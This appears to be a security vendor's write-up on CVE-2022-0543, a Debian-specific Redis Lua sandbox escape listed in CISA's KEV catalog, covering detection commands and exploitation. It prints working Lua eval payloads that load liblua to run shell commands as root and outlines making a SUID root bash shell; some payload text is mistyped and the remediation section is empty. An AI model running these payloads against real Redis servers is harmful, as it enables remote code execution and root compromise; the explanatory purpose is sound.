KEV Catalog: Debian-specific Redis Server Lua Sandbox Escape Vulnerability (CVE-2022-0543)

Known Vulnerability - Database

Debian-specific Redis Server Lua Sandbox Escape Vulnerability (CVE-2022-0543)

The CISA Known Exploited Vulnerabilities (KEV) Catalog lists cybersecurity vulnerabilities known to be actively exploited and helps prioritize vulnerability management. CISA includes a due date to remediate the vulnerability, typically two to three weeks from its submission. Actively monitoring the KEV catalog and understanding how these vulnerabilities can be exploited helps security teams recognize each vulnerability’s risk and threat to their network environments. Subscribe to CISA’s KEV Catalog Update Bulletin to stay up to date on new KEV Catalog vulnerabilities.

Date Added to KEV Catalog: March 03, 2022

CISA Due Date for Remediation: April 18, 2022

Vulnerability

Reginaldo Silva discovered a Debian-specific Lua sandbox escape in Redis, a persistent key-value database. Silva’s original post explains CVE-2022-0543. Silva explains the proper relationship between Redis and Lua engine is to be sandboxed:

 “Redis is a very widely used service for caching, but it’s also used as a message broker. Clients talk to a Redis server over a socket, send commands, and the server changes its state (i.e. its in-memory structures), in response to such commands. Redis embeds the Lua programming language as its scripting engine, which is made available through the eval command. The Lua engine is expected to be sandboxed, i.e., clients can interact with the Redis APIs from Lua, but should not be able to execute arbitrary code on the machine where Redis is running.” 

Silva goes on to explain that remote code execution can occur because Lua is dynamically loaded on Debian by Redis and the Lua variable package is present in the global environment. An attacker can import restricted Lua functions using the package variable in Redis and escape the enforced sandbox.  

Systems Affected and Detection

Ubuntu Version: CVE-2022-0543 affects Redis packages Ubuntu 21.10 and Ubuntu 20.04 LTS. Ubuntu versions can be checked using the linux command: uname –a  

Lib Lua Library Version: Since this vulnerability affects the package variable in the lua library, checking the liblua library can be done through linux command line:

ls -al /usr/lib/x86_64-linux-gnu/liblua5.1.so* 

Redis Server: The Redis server runs by default on port 6379 and can be checked using ps aux or netstat commands: netstat -plant  

 

The Redis command line interface can be used to send commands and read replies to and from the Redis Server.

redis-cli –h <IP>  

Vulnerability Check  

Silva’s post states that after accessing the Redis server, using redis-cli, this vulnerability can be tested by using the eval command, the global package variable, and attempting to create a local file called redis_poc in the “tmp” directory via the touch command: 

eval ‘local os_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so”, “luaopen_os”); local os = os_l(); os.execute(“touch /tmp/redis_poc“); return 0′

If the redis_poc file has root privileges, this shows you can create files with elevated privileges from the Redis Server. This demonstrates an escape from the redis server

You can check file permissions of the redis_poc file by opening a separate session, and using: ls –la /tmp/redis_poc

This same eval command can be used with the id command to confirm a user’s root privileges on the Redis server: 

eval ‘local io_l = package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0″, “luaopen_io“); local io = io_l(); local f = io.popen(“id“, “r”); local res = f:read(“*a”); f:close(); return res’ 0

The output from the eval and id command shows the user is root.

Tenable’s Ubuntu Local Security Checks and Debian Local Security Checks plugins should also be able to detect for CVE-2022-0543.  

Exploitation

Remote code execution is possible through the package variable, which allows malicious attackers to create an elevated shell using the eval command and package variable. This can be demonstrated using Github’s Vulhub, which provides docker containers of CVE environments. 

Instead of submitting the id command, a /bin/bash shell can be created from the Redis server that will provide a local user both a shell and root permissions:

eval ‘localio_l=package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0″, “luaopen_io“); local io =io_l(); local f =io.popen(“<commands>“, “r”); local res =f:read(“*a”);f:close(); return res’ 0

 

This bash shell can be made executable by changing the SUID root binary: chmod +s

The bash shell can now be run locally and gives the user root permissions. A local user would not have elevated privileges due to this vulnerability and access to the Redis server. 

On April 28, 2022, Rapid 7 released the Metasploit module, Redis Lua Sandbox Escape. InfosecMatter provides guidance on how to use the Metasploit module and two ways to setup an vulnerable environment 

Remediation

References: